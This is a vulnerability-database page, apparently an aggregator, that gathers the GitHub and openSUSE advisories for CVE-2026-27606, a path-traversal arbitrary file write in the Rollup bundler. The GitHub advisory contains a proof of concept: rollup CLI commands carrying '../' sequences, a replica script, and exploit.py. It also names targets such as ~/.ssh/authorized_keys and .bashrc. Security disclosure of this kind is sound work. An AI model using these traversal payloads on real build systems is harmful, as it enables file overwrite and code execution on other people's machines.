"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-27606"
}
]
}
GHSA-MW96-CPMX-2VGC
Vulnerability from github – Published: 2026-02-25 22:37 – Updated: 2026-02-25 22:37
VLAI?
Summary
Rollup 4 has Arbitrary File Write via Path Traversal
Details
Summary
The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (../) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.
Details
The vulnerability is caused by the combination of two flawed components in the Rollup core:
-
Improper Sanitization: In
src/utils/sanitizeFileName.ts, theINVALID_CHAR_REGEXused to clean user-provided names for chunks and assets excludes the period (.) and forward/backward slashes (/,\).typescript // src/utils/sanitizeFileName.ts (Line 3) const INVALID_CHAR_REGEX = /[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g;This allows path traversal sequences like../../to pass through the sanitizer unmodified. -
Unsafe Path Resolution: In
src/rollup/rollup.ts, thewriteOutputFilefunction usespath.resolveto combine the output directory with the "sanitized" filename.typescript // src/rollup/rollup.ts (Line 317) const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);Becausepath.resolvefollows the../sequences inoutputFile.fileName, the resulting path points outside of the intended output directory. The subsequent call tofs.writeFilecompletes the arbitrary write.
PoC
A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.
Scenario: CLI Named Input Exploit
1. Target a sensitive file location (for demonstration, we will use a file in the project root called pwned.js).
2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:
bash
rollup --input "a/../../pwned.js=main.js" --dir dist
3. Result: Rollup will resolve the output path for the entry chunk as dist + a/../../pwned.js, which resolves to the project root. The file pwned.js is created/overwritten outside the dist folder.
Reproduction Files provided :
* vuln_app.js: Isolated logic exactly replicating the sanitization and resolution bug.
* exploit.py: Automated script to run the PoC and verify the file escape.
vuln_app.js
const path = require('path');
const fs = require('fs');
/**
* REPLICATED ROLLUP VULNERABILITY
*
* 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)
* 2. Unsafe Path Resolution (from src/rollup/rollup.ts)
*/
function sanitize(name) {
// The vulnerability: Rollup's regex fails to strip dots and slashes,
// allowing path traversal sequences like '../'
return name.replace(/[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g, '_');
}
async function build(userSuppliedName) {
const outputDir = path.join(__dirname, 'dist');
const fileName = sanitize(userSuppliedName);
// Vulnerability: path.resolve() follows traversal sequences in the filename
const outputPath = path.resolve(outputDir, fileName);
console.log(`[*] Target write path: ${outputPath}`);
if (!fs.existsSync(path.dirname(outputPath))) {
fs.mkdirSync(path.dirname(outputPath), { recursive: true });
}
fs.writeFileSync(outputPath, 'console.log("System Compromised!");');
console.log(`[+] File written successfully.`);
}
build(process.argv[2] || 'bundle.js');
exploit.py
import subprocess
from pathlib import Path
def run_poc():
# Target a file outside the 'dist' folder
poc_dir = Path(__file__).parent
malicious_filename = "../pwned_by_rollup.js"
target_path = poc_dir / "pwned_by_rollup.js"
print(f"=== Rollup Path Traversal PoC ===")
print(f"[*] Malicious Filename: {malicious_filename}")
# Trigger the vulnerable app
subprocess.run(["node", "poc/vuln_app.js", malicious_filename])
if target_path.exists():
print(f"[SUCCESS] File escaped 'dist' folder!")
print(f"[SUCCESS] Created: {target_path}")
# target_path.unlink() # Cleanup
else:
print("[FAILED] Exploit did not work.")
if __name__ == "__main__":
run_poc()
POC
rollup --input "bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js" --dir dist
Impact
This is a High level of severity vulnerability.
* Arbitrary File Write: Attackers can overwrite sensitive files like ~/.ssh/authorized_keys, .bashrc, or system binaries if the build process has sufficient privileges.
* Supply Chain Risk: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.
* User Impact: Developers running builds on untrusted repositories are at risk of system compromise.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.80.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.30.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "rollup"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.59.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27606"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T22:37:26Z",
"nvd_published_at": "2026-02-25T03:16:04Z",
"severity": "HIGH"
},
"details": "### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%\u0026*+,:;\u003c=\u003e?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require(\u0027path\u0027);\nconst fs = require(\u0027fs\u0027);\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup\u0027s regex fails to strip dots and slashes, \n // allowing path traversal sequences like \u0027../\u0027\n return name.replace(/[\\u0000-\\u001F\"#$%\u0026*+,:;\u003c=\u003e?[\\]^`{|}\\u007F]/g, \u0027_\u0027);\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, \u0027dist\u0027);\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, \u0027console.log(\"System Compromised!\");\u0027);\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || \u0027bundle.js\u0027);\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the \u0027dist\u0027 folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped \u0027dist\u0027 folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n\u003cimg width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" /\u003e\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer\u0027s machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.",
"id": "GHSA-mw96-cpmx-2vgc",
"modified": "2026-02-25T22:37:26Z",
"published": "2026-02-25T22:37:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"type": "PACKAGE",
"url": "https://github.com/rollup/rollup"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"type": "WEB",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Rollup 4 has Arbitrary File Write via Path Traversal"
}
OPENSUSE-SU-2026:10263-1
Vulnerability from csaf_opensuse - Published: 2026-02-26 00:00 - Updated: 2026-02-26 00:00Summary
heroic-games-launcher-2.20.0-2.1 on GA media
Severity
Moderate
Notes
Title of the patch: heroic-games-launcher-2.20.0-2.1 on GA media
Description of the patch: These are all security issues fixed in the heroic-games-launcher-2.20.0-2.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10263
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "heroic-games-launcher-2.20.0-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the heroic-games-launcher-2.20.0-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10263",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10263-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27606/"
}
],
"title": "heroic-games-launcher-2.20.0-2.1 on GA media",
"tracking": {
"current_release_date": "2026-02-26T00:00:00Z",
"generator": {
"date": "2026-02-26T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10263-1",
"initial_release_date": "2026-02-26T00:00:00Z",
"revision_history": [
{
"date": "2026-02-26T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.aarch64",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.aarch64",
"product_id": "heroic-games-launcher-2.20.0-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"product_id": "heroic-games-launcher-2.20.0-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.s390x",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.s390x",
"product_id": "heroic-games-launcher-2.20.0-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "heroic-games-launcher-2.20.0-2.1.x86_64",
"product": {
"name": "heroic-games-launcher-2.20.0-2.1.x86_64",
"product_id": "heroic-games-launcher-2.20.0-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "heroic-games-launcher-2.20.0-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
},
"product_reference": "heroic-games-launcher-2.20.0-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27606"
}
],
"notes": [
{
"category": "general",
"text": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27606",
"url": "https://www.suse.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "SUSE Bug 1258846 for CVE-2026-27606",
"url": "https://bugzilla.suse.com/1258846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.aarch64",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.ppc64le",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.s390x",
"openSUSE Tumbleweed:heroic-games-launcher-2.20.0-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-26T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-27606"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…